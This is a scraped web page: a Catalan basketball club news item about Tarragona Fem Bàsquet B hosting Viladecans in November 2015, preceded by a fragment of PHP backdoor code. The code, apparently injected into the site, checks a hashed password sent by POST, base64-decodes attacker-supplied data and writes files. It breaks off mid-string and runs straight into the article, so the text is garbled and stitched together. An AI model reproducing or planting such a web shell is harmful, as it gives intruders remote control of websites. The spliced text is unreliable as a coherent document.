function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet B rep el tercer classificat, el Viladecans (dissabte, 16.30 h) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet B rep el tercer classificat, el Viladecans (dissabte, 16.30 h)

By
Updated: novembre 13, 2015

El Tarragona Fem Bàsquet B rep demà el tercer classificat de la lliga, el Viladecans, en un horari poc habitual. El conjunt lila disputa el partit a dos quarts de cinc de la tarda (16.30 h) en lloc de les 18.30 h en què acostuma a jugar davant el seu públic al pavelló del Sagrat Cor, tot i que el tècnic, Sergi Farré i les jugadores, esperen el suport del públic per derrotar un adversari potent. “Hi ha hagut un canvi d’horari aquesta setmana i necessitem tot el suport de la nostra gent. Espero que el públic vingui a ajudar-nos perquè el partit és difícil i les noies ho agrairan”, Farré.

El Viladecans és un conjunt dur. Actualment ocupa la tercera posició de la classificació amb un balanç de 6 victòries 1 una sola derrota (contra el Reus Deportiu en la quarta jornada, 56-51), a un triomf de l’Igualada i el Barça, que no han perdut cap partit. El Tarragona Fem Bàsquet B, per la seva banda, és cuer amb cap victòria i 6 derrotes, però el tècnic Sergi Farré confia en què aquest pot ser el partit de l’estrena: “Hem entrenat molt bé durant la setmana, incidint en aspectes com el tir i el control del joc, perquè no ens passi com en altres partits, en què l’equip es descontrola i aleshores arriben les derrotes. No sortirem només a fer un bon paper i competir, sinó que el nostre objectiu és guanyar, és clar”.

Farré no podrà comptar amb Sandra Pascual, que continua recuperant-se de la seva lesió i té els dubtes de Zerouali, que ha forçat la màquina per estar a punt en aquest partit tot i no estar recuperada totalment del seu turmell i de Robledo, que en l’entrenament de dimecres es va ressentir d’una antiga lesió de genoll.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *